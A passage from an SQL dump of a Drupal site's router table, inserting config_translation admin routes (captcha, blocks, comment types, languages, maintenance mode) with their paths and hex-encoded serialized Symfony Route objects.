733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34373a222f61646d696e2f636f6e6669672f73797374656d2f736974652d696e666f726d6174696f6e2f7472616e736c617465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35363a222f61646d696e2f636f6e6669672f73797374656d2f736974652d696e666f726d6174696f6e2f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('config_translation.item.delete.system.site_maintenance_mode', '/admin/config/development/maintenance/translate/{langcode}/delete', '/admin/config/development/maintenance/translate/%/delete', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36353a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f6d61696e74656e616e63652f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a32383a2273797374656d2e736974655f6d61696e74656e616e63655f6d6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38323a227b5e2f61646d696e2f636f6e6669672f646576656c6f706d656e742f6d61696e74656e616e63652f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34373a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f6d61696e74656e616e63652f7472616e736c617465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35363a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f6d61696e74656e616e63652f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('config_translation.item.edit.captcha_settings', '/admin/config/people/captcha/translate/{langcode}/edit', '/admin/config/people/captcha/translate/%/edit', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35343a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31363a22636170746368612e73657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37313a227b5e2f61646d696e2f636f6e6669672f70656f706c652f636170746368612f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33383a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f7472616e736c617465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34353a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('config_translation.item.edit.entity.block.edit_form', '/admin/structure/block/manage/{block}/translate/{langcode}/edit', '/admin/structure/block/manage/%/translate/%/edit', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36333a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f7b626c6f636b7d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a353a22626c6f636b223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a353a22626c6f636b223b613a323a7b733a343a2274797065223b733a31323a22656e746974793a626c6f636b223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a353a22626c6f636b223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39303a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f283f503c626c6f636b3e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a353a22626c6f636b223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a353a22626c6f636b223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a34383a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.edit.entity.block_content_type.edit_form', '/admin/structure/block-content/manage/{block_content_type}/translate/{langcode}/edit', '/admin/structure/block-content/manage/%/translate/%/edit', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38343a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131323a227b5e2f61646d696e2f7374727563747572652f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a35363a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.edit.entity.block_content_type.edit_form.bc', '/admin/structure/block/block-content/manage/{block_content_type}/translate/{langcode}/edit', '/admin/structure/block/block-content/manage/%/translate/%/edit', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a39303a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a393a22706c7567696e5f6964223b733a31383a22626c6f636b5f636f6e74656e745f74797065223b733a31313a225f636f6e74726f6c6c6572223b733a38313a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b436f6e74656e74547970655265646972656374223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131383a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a36323a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a393b7d7d, 9);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('config_translation.item.edit.entity.captcha_point.edit_form', '/admin/config/people/captcha/captcha-points/{captcha_point}/translate/{langcode}/edit', '/admin/config/people/captcha/captcha-points/%/translate/%/edit', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38353a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f636170746368612d706f696e74732f7b636170746368615f706f696e747d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31333a22636170746368615f706f696e74223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31333a22636170746368615f706f696e74223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a636170746368615f706f696e74223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31333a22636170746368615f706f696e74223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131333a227b5e2f61646d696e2f636f6e6669672f70656f706c652f636170746368612f636170746368615c2d706f696e74732f283f503c636170746368615f706f696e743e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a22636170746368615f706f696e74223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f636170746368612d706f696e7473223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31333a22636170746368615f706f696e74223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a36323a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f636170746368612d706f696e74732f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.edit.entity.comment_type.edit_form', '/admin/structure/comment/manage/{comment_type}/translate/{langcode}/edit', '/admin/structure/comment/manage/%/translate/%/edit', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37323a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f7b636f6d6d656e745f747970657d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31323a22636f6d6d656e745f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6d6d656e745f74797065223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6d6d656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31323a22636f6d6d656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39393a227b5e2f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f283f503c636f6d6d656e745f747970653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6d6d656e745f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31323a22636f6d6d656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a35303a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.edit.entity.configurable_language.edit_form', '/admin/config/regional/language/edit/{configurable_language}/translate/{langcode}/edit', '/admin/config/regional/language/edit/%/translate/%/edit', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38363a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f656469742f7b636f6e666967757261626c655f6c616e67756167657d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a32313a22636f6e666967757261626c655f6c616e6775616765223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a32313a22636f6e666967757261626c655f6c616e6775616765223b613a323a7b733a343a2274797065223b733a32383a22656e746974793a636f6e666967757261626c655f6c616e6775616765223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a32313a22636f6e666967757261626c655f6c616e6775616765223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131333a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f656469742f283f503c636f6e666967757261626c655f6c616e67756167653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a32313a22636f6e666967757261626c655f6c616e6775616765223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33363a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f65646974223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a32313a22636f6e666967757261626c655f6c616e6775616765223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a35353a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f656469742f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.edit.entity.contact_form.edit_form', '/admin/structure/contact/manage/{contact_form}/translate/{langcode}/edit', '/admin/structure/contact/manage/%/translate/%/edit', 245, 